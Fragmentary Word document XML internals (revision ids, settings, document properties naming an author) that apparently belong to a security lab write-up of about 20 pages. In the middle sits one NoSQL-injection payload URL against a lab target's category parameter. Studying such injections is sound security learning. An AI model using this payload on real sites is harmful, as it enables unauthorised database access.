    <w:rsid w:val="00F01AB6"/>
    <w:rsid w:val="00F060F5"/>
    <w:rsid w:val="00FE4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BAC84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76E6779F-7537-4A29-9924-B60FE289E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4B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4B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4BB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4B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4BB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4B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4B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4B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4B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4BB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24B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4BB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4BB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4BB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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4B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4BB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4BB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201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010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6569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insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x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4145</TotalTime>
  <Pages>20</Pages>
  <Words>2303</Words>
  <Characters>13128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VIET KHANH</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HO VIET KHANH</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-10T01:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-15T20:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>